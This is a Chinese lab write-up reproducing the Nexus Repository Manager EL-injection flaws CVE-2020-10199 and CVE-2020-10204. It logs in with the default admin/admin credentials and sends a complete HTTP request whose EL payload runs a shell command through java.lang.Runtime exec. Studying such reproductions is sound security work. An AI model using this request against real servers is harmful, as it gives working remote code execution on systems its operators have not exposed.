漏洞描述
Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的。
漏洞影响
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
复现过程
1.初始化镜像环境
2.用弱口令登录,账号:admin,密码:admin
然后使用bp抓包
执行下面代码验证
POST /service/extdirect HTTP/1.1
Host: 192.168.182.131:8081 # 本机地址
Content-Length: 218
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.35645732421610665 # 复制自己的token
Content-Type: application/json
Accept: */*
Origin: http://192.168.182.131:8081
Referer: http://192.168.182.131:8081/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.35645732421610665; NXSESSIONID=6c50ec75-40c9-4bc0-906d-695f95bf41bc # 复制自己的token和cookie
Connection: close
{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["$\\B{233*233}"]}],"type":"rpc","tid":11}
然后将
"$\\B{233*233}"
改为
"
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"
在虚拟机验证是否成功
这样漏洞就复现完毕,中途又不懂的代码可看前一文章有详细讲解
微信公众号:猫蛋儿安全